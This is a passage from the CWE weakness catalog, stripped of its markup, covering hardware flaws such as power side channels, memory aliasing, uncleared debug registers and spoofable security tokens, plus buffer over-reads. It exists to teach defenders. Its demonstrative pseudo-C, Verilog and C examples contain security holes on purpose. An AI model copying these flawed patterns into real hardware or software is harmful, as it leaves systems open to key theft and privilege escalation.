real time power consumption may be monitored during security token evaluation and the information gleaned may be used to determine the value of the reference token. + + The power consumed by a device may be instrumented and monitored in real time. If the algorithm for evaluating security tokens is not sufficiently robust, the power consumption may vary by token entry comparison against the reference value. Further, if retries are unlimited, the power difference between a "good" entry and a "bad" entry may be observed and used to determine whether each entry itself is correct thereby allowing unauthorized parties to calculate the reference value. + + + + + + + + + + + + + + Architecture and Design + The design of the algorithm itself may intrinsically allow the power side channel attack to be effective + + + Implementation + This weakness may be introduced during implementation despite a robust design that otherwise prevents exploitation + + + + + Confidentiality + Integrity + Availability + Access Control + Accountability + Authentication + Authorization + Non-Repudiation + Modify Memory + Read Memory + Read Files or Directories + Modify Files or Directories + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Read Application Data + Modify Application Data + Hide Activities + As compromising a security token may result in complete system control, the impacts are relatively universal + + + + + Architecture and Design + The design phase must consider each check of a security token against a standard and the amount of power consumed during the check of a good token versus a bad token. The alternative is an all at once check where a retry counter is incremented PRIOR to the check. + + + Architecture and Design + Another potential mitigation is to parallelize shifting of secret data (see example 2 below). Note that the wider the bus the more effective the result. + + + Architecture and Design + An additional potential mitigation is to add random data to each crypto operation then subtract it out afterwards. This is highly effective but costly in performance, area, and power consumption. It also requires a random number generator. + + + Implementation + If the architecture is unable to prevent the attack, using filtering components may reduce the ability to implement an attack, however, consideration must be given to the physical removal of the filter elements. + + + Integration + During integration, avoid use of a single secret for an extended period (e.g. frequent key updates). This limits the amount of data compromised but at the cost of complexity of use. + + + + + Consider an example hardware module that checks a user-provided password (or PIN) to grant access to a user. The user-provided password is compared against a stored value byte-by-byte. + + static nonvolatile password_tries = NUM_RETRIES; + do + + while (password_tries == 0) ; // Hang here if no more password tries + password_ok = 0; + for (i = 0; i < NUM_PW_DIGITS; i++) + + if (GetPasswordByte() == stored_password([i]) + + password_ok |= 1; // Power consumption is different here + + else + + password_ok |= 0; // than from here + + + end + if (password_ok > 0) + + password_tries = NUM_RETRIES; + break_to_Ok_to_proceed + + password_tries--; + + while (true) + // Password OK + + Since the algorithm uses a different number of 1's and 0's for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes. + Among various options for mitigating the string comparison is obscuring the power consumption by having opposing bit flips during bit operations. Note that in this example, the initial change of the bit values could still provide power indication depending upon the hardware itself. This possibility needs to be measured for verification. + + static nonvolatile password_tries = NUM_RETRIES; + do + + while (password_tries == 0) ; // Hang here if no more password tries + password_tries--; // Put retry code here to catch partial retries + password_ok = 0; + for (i = 0; i < NUM_PW_DIGITS; i++) + + if (GetPasswordByte() == stored_password([i]) + + password_ok |= 0x10; // Power consumption here + + else + + password_ok |= 0x01; // is now the same here + + + end + if ((password_ok & 1) == 0) + + password_tries = NUM_RETRIES; + break_to_Ok_to_proceed + + + while (true) + // Password OK + + Since the algorithm uses a different number of 1's and 0's for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes. + An alternative to the previous example is simply comparing the whole password simultaneously. + + static nonvolatile password_tries = NUM_RETRIES; + do + + while (password_tries == 0) ; // Hang here if no more password tries + password_tries--; // Put retry code here to catch partial retries + for (i = 0; i < NUM_PW_DIGITS; i++) + + stored_password([i]) = GetPasswordByte(); + + end + if (stored_password == saved_password) + + password_tries = NUM_RETRIES; + break_to_Ok_to_proceed + + + while (true) + // Password OK + + Since comparison is done atomically, there is no indication which bytes fail forcing the attacker to brute force the whole password at once. Note that other mitigations may exist such as masking - causing a large current draw to mask individual bit flips. + + + This code demonstrates the transfer of a secret key using Serial-In/Serial-Out shift. It's easy to extract the secret using simple power analysis as each shift gives data on a single bit of the key. + + module siso(clk,rst,a,q); + + input a; + input clk,rst; + output q; + reg q; + + always@(posedge clk,posedge rst) + begin + + if(rst==1'b1) + + q<1'b0; + + else + + q<a; + + + end + + endmodule + + This code demonstrates the transfer of a secret key using a Parallel-In/Parallel-Out shift. In a parallel shift, data confounded by multiple bits of the key, not just one. + + module pipo(clk,rst,a,q); + + input clk,rst; + input[3:0]a; + output[3:0]q; + reg[3:0]q; + + always@(posedge clk,posedge rst) + begin + + if (rst==1'b1) + + q<4'b0000; + + else + + q<a; + + + end + + endmodule + + + + + + CVE-2020-12788 + CMAC verification vulnerable to timing and power attacks. + https://www.cve.org/CVERecord?id=CVE-2020-12788 + + + + Power + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2020-05-29 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Functional_Areas, Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Maintenance_Notes, References, Relationships, Type + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Accellera IP Security Assurance (IPSA) Working Group + Accellera Systems Initiative + 2020-09-09 + Submitted new material that could be added to already-existing entry CWE-1255. Added new Potential Mitigations, a new example, an observed example, and an additional reference. + + + + + + + The product provides software-controllable + device functionality for capabilities such as power and + clock management, but it does not properly limit + functionality that can lead to modification of + hardware memory or register bits, or the ability to + observe physical side channels. + + It is frequently assumed that physical attacks + such as fault injection and side-channel analysis + require an attacker to have physical access to the + target device. This assumption may be false if the + device has improperly secured power management features, + or similar features. For mobile devices, minimizing + power consumption is critical, but these devices run a + wide variety of applications with different performance + requirements. Software-controllable mechanisms to + dynamically scale device voltage and frequency and + monitor power consumption are common features in today's + chipsets, but they also enable attackers to mount fault + injection and side-channel attacks without having + physical access to the device. + + Fault injection attacks involve strategic + manipulation of bits in a device to achieve a desired + effect such as skipping an authentication step, + elevating privileges, or altering the output of a + cryptographic operation. Manipulation of the device + clock and voltage supply is a well-known technique to + inject faults and is cheap to implement with physical + device access. Poorly protected power management + features allow these attacks to be performed from + software. Other features, such as the ability to write + repeatedly to DRAM at a rapid rate from unprivileged + software, can result in bit flips in other memory + locations (Rowhammer, [REF-1083]). + + Side channel analysis requires gathering + measurement traces of physical quantities such as power + consumption. Modern processors often include power + metering capabilities in the hardware itself (e.g., + Intel RAPL) which if not adequately protected enable + attackers to gather measurements necessary for + performing side-channel attacks from software. + + + + + + + Primary + + + + + + + + + + + + + + Architecture and Design + An architect may initiate introduction of + this weakness via exacting requirements for + software accessible power/clock management + requirements + + + Implementation + An implementer may introduce this weakness + by assuming there are no consequences to unbounded + power and clock management for secure components + from untrusted ones. + + + + + Integrity + Modify Memory + Modify Application Data + Bypass Protection Mechanism + + + + + Manual Analysis + Perform a security evaluation of system-level + architecture and design with software-aided physical attacks + in scope. + + + Automated Dynamic Analysis + + Use custom software to change registers that control clock settings or power settings to try to bypass security locks, or repeatedly write DRAM to try to change adjacent locations. This can be effective in extracting or changing data. The drawback is that it cannot be run before manufacturing, and it may require specialized software. + + Moderate + + + + + Architecture and Design + Implementation + + Ensure proper access control mechanisms protect software-controllable features altering physical operating conditions such as clock frequency and voltage. + + + + + + This example considers the Rowhammer problem [REF-1083]. The Rowhammer issue was caused by a program in a tight loop writing repeatedly to a location to which the program was allowed to write but causing an adjacent memory location value to change. + + Continuously writing the same value to the same address causes the value of an adjacent location to change value. + + Preventing the loop required to defeat the Rowhammer exploit is not always possible: + + Redesign the RAM devices to reduce inter capacitive coupling making the Rowhammer exploit impossible. + + While the redesign may be possible for new devices, a redesign is not possible in existing devices. There is also the possibility that reducing capacitance with a relayout would impact the density of the device resulting in a less capable, more costly device. + + + Suppose a hardware design implements a set of software-accessible registers for scaling clock frequency and voltage but does not control access to these registers. Attackers may cause register and memory changes and race conditions by changing the clock or voltage of the device under their control. + + + Consider the following SoC + design. Security-critical settings for scaling clock + frequency and voltage are available in a range of + registers bounded by [PRIV_END_ADDR : PRIV_START_ADDR] + in the tmcu.csr module in the HW Root of Trust. These + values are writable based on the lock_bit register in + the same module. The lock_bit is only writable by + privileged software running on the tmcu. + + + + We assume that untrusted software running on any of the + Core{0-N} processors has access to the input and output + ports of the hrot_iface. If untrusted software can clear + the lock_bit or write the clock frequency and voltage + registers due to inadequate protection, a fault + injection attack could be performed. + + + + + + CVE-2019-11157 + Plundervolt: Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access [REF-1081]. + https://www.cve.org/CVERecord?id=CVE-2019-11157 + + + CVE-2020-8694 + PLATYPUS Attack: Insufficient access control in the Linux kernel driver for some Intel processors allows information disclosure. + https://www.cve.org/CVERecord?id=CVE-2020-8694 + + + CVE-2020-8695 + Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure. + https://www.cve.org/CVERecord?id=CVE-2020-8695 + + + CVE-2020-12912 + AMD extension to a Linux service does not require privileged access to the RAPL interface, allowing side-channel attacks. + https://www.cve.org/CVERecord?id=CVE-2020-12912 + + + CVE-2015-0565 + NaCl in 2015 allowed the CLFLUSH instruction, making Rowhammer attacks possible. + https://www.cve.org/CVERecord?id=CVE-2015-0565 + + + + Power + Clock + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Nicole Fern + Tortuga Logic + 2020-05-08 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Maintenance_Notes, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Functional_Areas, Maintenance_Notes + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Modes_of_Introduction, Name, Observed_Examples, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Tortuga Logic + 2021-07-16 + Provided Demonstrative Example for Hardware Root of Trust + + + Anders Nordstrom, Alric Althoff + Tortuga Logic + 2021-10-11 + Provided detection method + + + Nicole Fern + Riscure + 2021-10-15 + updated description and extended description, detection method, and observed examples + + Hardware Features Enable Physical Attacks from Software + + + + Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region. + + + Hardware product designs often need to implement memory protection features that enable privileged software to define isolated memory regions and access control (read/write) policies. Isolated memory regions can be defined on different memory spaces in a design (e.g. system physical address, virtual address, memory mapped IO). + Each memory cell should be mapped and assigned a system address that the core software can use to read/write to that memory. It is possible to map the same memory cell to multiple system addresses such that read/write to any of the aliased system addresses would be decoded to the same memory cell. + This is commonly done in hardware designs for redundancy and simplifying address decoding logic. If one of the memory regions is corrupted or faulty, then that hardware can switch to using the data in the mirrored memory region. Memory aliases can also be created in the system address map if the address decoder unit ignores higher order address bits when mapping a smaller address region into the full system address. + A common security weakness that can exist in such memory mapping is that aliased memory regions could have different read/write access protections enforced by the hardware such that an untrusted agent is blocked from accessing a memory address but is not blocked from accessing the corresponding aliased memory address. Such inconsistency can then be used to bypass the access protection of the primary memory block and read or modify the protected memory. + An untrusted agent could also possibly create memory aliases in the system address map for malicious purposes if it is able to change the mapping of an address region or modify memory region sizes. + + + + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Memory + High + + + Integrity + Modify Memory + High + + + Availability + DoS: Instability + High + + + + + Architecture and Design + Implementation + The checks should be applied for consistency access rights between primary memory regions and any mirrored or aliased memory regions. If different memory protection units (MPU) are protecting the aliased regions, their protected range definitions and policies should be synchronized. + + + Architecture and Design + Implementation + The controls that allow enabling memory aliases or changing the size of mapped memory regions should only be programmable by trusted software components. + + + + + + In a System-on-a-Chip (SoC) design the system fabric uses 16 bit addresses. An IP unit (Unit_A) has 4 kilobyte of internal memory which is mapped into a 16 kilobyte address range in the system fabric address map. + + + + System Address + + + Mapped to + + + + + 0x0000 - 0x3FFF + + + Unit_A registers : 0x0000 - 0x0FFF + + + + + 0x4000 - 0xFFFF + + + Other IPs & Memory + + + + + To protect the register controls in Unit_A unprivileged software is blocked from accessing addresses between 0x0000 - 0x0FFF. + + + The address decoder of Unit_A masks off the higher order address bits and decodes only the lower 12 bits for computing the offset into the 4 kilobyte internal memory space. + + + + In this design the aliased memory address ranges are these: + + 0x0000 - 0x0FFF + 0x1000 - 0x1FFF + 0x2000 - 0x2FFF + 0x3000 - 0x3FFF + + The same register can be accessed using four different addresses: 0x0000, 0x1000, 0x2000, 0x3000. + + + The system address filter only blocks access to range 0x0000 - 0x0FFF and does not block access to the aliased addresses in 0x1000 - 0x3FFF range. Thus, untrusted software can leverage the aliased memory addresses to bypass the memory protection. + + + + + In this design the aliased memory addresses (0x1000 - 0x3FFF) could be blocked from all system software access since they are not used by software. + + + Alternately, the MPU logic can be changed to apply the memory protection policies to the full address range mapped to Unit_A (0x0000 - 0x3FFF). + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-04-29 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The hardware does not fully clear security-sensitive values, such as keys and intermediate values in cryptographic operations, when debug mode is entered. + + Security sensitive values, keys, intermediate steps of cryptographic operations, etc. are stored in temporary registers in the hardware. If these values are not cleared when debug mode is entered they may be accessed by a debugger allowing sensitive information to be accessible by untrusted parties. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Memory + + + Access Control + Bypass Protection Mechanism + + + + + Architecture and Design + + Whenever debug mode is enabled, all registers containing sensitive assets must be cleared. + + + + + + A cryptographic core in a System-On-a-Chip (SoC) is used for cryptographic acceleration and implements several cryptographic operations (e.g., computation of AES encryption and decryption, SHA-256, HMAC, etc.). The keys for these operations or the intermediate values are stored in registers internal to the cryptographic core. These internal registers are in the Memory Mapped Input Output (MMIO) space and are blocked from access by software and other untrusted agents on the SoC. These registers are accessible through the debug and test interface. + + In the above scenario, registers that store keys and intermediate values of cryptographic operations are not cleared when system enters debug mode. An untrusted actor running a debugger may read the contents of these registers and gain access to secret keys and other sensitive cryptographic information. + + Whenever the chip enters debug mode, all registers containing security-sensitive data are be cleared rendering them unreadable. + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Sensitive Information Uncleared During Hardware Debug Flows + + + + The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected. + Systems-On-A-Chip (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify which actions originated from which agent. These actions may be one of the directives: 'read', 'write', 'program', 'reset', 'fetch', 'compute', etc. Security Tokens are assigned to every agent in the System that is capable of generating an action or receiving an action from another agent. Multiple Security Tokens may be assigned to an agent and may be unique based on the agent's trust level or allowed privileges. Since the Security Tokens are integral for the maintenance of security in an SoC, they need to be protected properly. A common weakness afflicting Security Tokens is improperly restricting the assignment to trusted components. Consequently, an improperly protected Security Token may be able to be programmed by a malicious agent (i.e., the Security Token is mutable) to spoof the action as if it originated from a trusted agent. + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Files or Directories + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Modify Memory + Modify Memory + DoS: Crash, Exit, or Restart + High + + + + + Architecture and Design + Implementation + + + Security Token assignment review checks for design inconsistency and common weaknesses. + Security-Token definition and programming flow is tested in both pre-silicon and post-silicon testing. + + + + + + + For example, consider a system with a register for storing an AES key for encryption and decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key register assets have an associated control register, AES_KEY_ACCESS_POLICY, which provides the necessary access controls. This access-policy register defines which agents may engage in a transaction, and the type of transaction, with the AES-key registers. Each bit in this 32-bit register defines a security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., "1") allows respective action from an agent whose identity matches the number of the bit and, if "0" (i.e., Clear), disallows the respective action to that corresponding agent. + + + Let's assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are "1" and "2". + + + + Register + Description + Default + + + AES_ENC_DEC_KEY_0 + AES key [0:31] for encryption or decryption + 0x00000000 + + + AES_ENC_DEC_KEY_1 + AES key [32:63] for encryption or decryption + 0x00000000 + + + AES_ENC_DEC_KEY_2 + AES key [64:95] for encryption or decryption + 0x00000000 + + + AES_ENC_DEC_KEY_3 + AES key [96:127] for encryption or decryption + 0x00000000 + + + AES_KEY_ACCESS_POLICY + AES key access register [31:0] + 0x00000002 + + + + + An agent with Security Token "1" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is "1". + + The Aux-controller could program its Security Token to "1" from "2". + The SoC does not properly protect the Security Token of the agents, and, hence, the Aux-controller in the above example can spoof the transaction (i.e., send the transaction as if it is coming from the Main-controller to access the AES-Key registers) + The SoC needs to protect the Security Tokens. None of the agents in the SoC should have the ability to change the Security Token. + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This entry is still under development and will continue to see updates and content improvements. Currently it is expressed as a general absence of a protection mechanism as opposed to a specific mistake, and the entry's name and description could be interpreted as applying to software. + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-03-06 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Description + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + MaineK00n + 2022-10-31 + corrected a typo in extended description + + Improper Protection of Security Identifiers + + + + The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer. + This typically occurs when the pointer or its index is incremented to a position beyond the bounds of the buffer or when pointer arithmetic results in a position outside of the valid memory location to name a few. This may result in exposure of sensitive information or possibly a crash. + + + + + + + Primary + + + + + + + + + Implementation + + + + + Confidentiality + Read Memory + + + Confidentiality + Bypass Protection Mechanism + By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing. + + int processMessageFromSocket(int socket) { + int success; + char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE]; + + // get message from socket and store into buffer + + + //Ignoring possibliity that buffer > BUFFER_SIZE + if (getMessage(socket, buffer, BUFFER_SIZE) > 0) { + + + // place contents of the buffer into message structure + ExMessage *msg = recastBuffer(buffer); + + // copy message body into string for processing + int index;for (index = 0; index < msg->msgLength; index++) {message[index] = msg->msgBody[index];}message[index] = '\0'; + + // process message + success = processMessage(message); + }return success; + } + + However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130). + + + The following C/C++ example demonstrates a buffer over-read due to a missing NULL terminator. The main method of a pattern matching utility that looks for a specific pattern within a specific file uses the string strncopy() method to copy the command line user input file name and pattern to the Filename and Pattern character arrays respectively. + + int main(int argc, char **argv){ + char Filename[256];char Pattern[32]; + + /* Validate number of parameters and ensure valid content */ + ... + + /* copy filename parameter to variable, may cause off-by-one overflow */ + strncpy(Filename, argv[1], sizeof(Filename)); + + /* copy pattern parameter to variable, may cause off-by-one overflow */ + strncpy(Pattern, argv[2], sizeof(Pattern)); + printf("Searching file: %s for the pattern: %s\n", Filename, Pattern);Scan_File(Filename, Pattern);} + + However, the code do not take into account that strncpy() will not add a NULL terminator when the source buffer is equal in length of longer than that provide size attribute. Therefore if a user enters a filename or pattern that are the same size as (or larger than) their respective character arrays, a NULL terminator will not be added (CWE-170) which leads to the printf() read beyond the expected end of the Filename and Pattern buffers. + To fix this problem, be sure to subtract 1 from the sizeof() call to allow room for the null byte to be added. + + + /* copy filename parameter to variable, no off-by-one overflow */ + strncpy(Filename, argv[2], sizeof(Filename)-1);Filename[255]='\0'; + + /* copy pattern parameter to variable, no off-by-one overflow */ + strncpy(Pattern, argv[3], sizeof(Pattern)-1);Pattern[31]='\0'; + + + + + + CVE-2014-0160 + Chain: "Heartbleed" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data. + https://www.cve.org/CVERecord?id=CVE-2014-0160 + + + CVE-2009-2523 + Chain: product does not handle when an input string is not NULL terminated, leading to buffer over-read or heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2009-2523 + + + + + Buffer over-read + + + SFP8 + Faulty Buffer Access + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + These problems may be resultant from missing sentinel values (CWE-463) or trusting a user-influenced input length variable. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Demonstrative_Examples + + + CWE Content Team + MITRE + 2018-03-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-09-19 + updated Common_Consequences, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product allows address regions to overlap, which can result in the bypassing of intended memory protection. + + Isolated memory regions and access control (read/write) policies are used by hardware to protect privileged software. Software components are often allowed to change or remap memory region definitions in order to enable flexible and dynamically changeable memory management by system software. + If a software component running at lower privilege can program a memory address region to overlap with other memory regions used by software running at higher privilege, privilege escalation may be available to attackers. The memory protection unit (MPU) logic can incorrectly handle such an address overlap and allow the lower-privilege software to read or write into the protected memory region, resulting in privilege escalation attack. An address overlap weakness can also be used to launch a denial of service attack on the higher-privilege software memory regions. + + + + + + + + Primary + + + Resultant + + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design or implementation and identified later during the Testing phase. + + + Implementation + + + + + Confidentiality + Integrity + Availability + Modify Memory + Read Memory + DoS: Instability + High + + + + + Manual Analysis + Create a high privilege memory block of any arbitrary size. Attempt to create a lower privilege memory block with an overlap of the high privilege memory block. If the creation attempt works, fix the hardware. Repeat the test. + High + + + + + Architecture and Design + + Ensure that memory regions are isolated as intended and that access control (read/write) policies are used by hardware to protect privileged software. + + + + Implementation + + For all of the programmable memory protection regions, the memory protection unit (MPU) design can define a priority scheme. + For example: if three memory regions can be programmed (Region_0, Region_1, and Region_2), the design can enforce a priority scheme, such that, if a system address is within multiple regions, then the region with the lowest ID takes priority and the access-control policy of that region will be applied. In some MPU designs, the priority scheme can also be programmed by trusted software. + Hardware logic or trusted firmware can also check for region definitions and block programming of memory regions with overlapping addresses. + The memory-access-control-check filter can also be designed to apply a policy filter to all of the overlapping ranges, i.e., if an address is within Region_0 and Region_1, then access to this address is only granted if both Region_0 and Region_1 policies allow the access. + + High + + + + + + For example, consider a design with a 16-bit address that has two software privilege levels: Privileged_SW and Non_privileged_SW. To isolate the system memory regions accessible by these two privilege levels, the design supports three memory regions: Region_0, Region_1, and Region_2. + Each region is defined by two 32 bit registers: its range and its access policy. + + Address_range[15:0]: specifies the Base address of the region + Address_range[31:16]: specifies the size of the region + Access_policy[31:0]: specifies what types of software can access a region and which actions are allowed + + Certain bits of the access policy are defined symbolically as follows: + + Access_policy.read_np: if set to one, allows reads from Non_privileged_SW + Access_policy.write_np: if set to one, allows writes from Non_privileged_SW + Access_policy.execute_np: if set to one, allows code execution by Non_privileged_SW + Access_policy.read_p: if set to one, allows reads from Privileged_SW + Access_policy.write_p: if set to one, allows writes from Privileged_SW + Access_policy.execute_p: if set to one, allows code execution by Privileged_SW + + For any requests from software, an address-protection filter checks the address range and access policies for each of the three regions, and only allows software access if all three filters allow access. + Consider the following goals for access control as intended by the designer: + + Region_0 & Region_1: registers are programmable by Privileged_SW + Region_2: registers are programmable by Non_privileged_SW + + The intention is that Non_privileged_SW cannot modify memory region and policies defined by Privileged_SW in Region_0 and Region_1. Thus, it cannot read or write the memory regions that Privileged_SW is using. + + + Non_privileged_SW can program the Address_range register for Region_2 so that its address overlaps with the ranges defined by Region_0 or Region_1. Using this capability, it is possible for Non_privileged_SW to block any memory region from being accessed by Privileged_SW, i.e., Region_0 and Region_1. + + This design could be improved in several ways. + Ensure that software accesses to memory regions are only permitted if all three filters permit access. Additionally, the scheme could define a memory region priority to ensure that Region_2 (the memory region defined by Non_privileged_SW) cannot overlap Region_0 or Region_1 (which are used by Privileged_SW). + + + The example code below is taken from the IOMMU controller module of the HACK@DAC'19 buggy CVA6 SoC [REF-1338]. The static memory map is composed of a set of Memory-Mapped Input/Output (MMIO) regions covering different IP agents within the SoC. Each region is defined by two 64-bit variables representing the base address and size of the memory region (XXXBase and XXXLength). + In this example, we have 12 IP agents, and only 4 of them are called out for illustration purposes in the code snippets. Access to the AES IP MMIO region is considered privileged as it provides access to AES secret key, internal 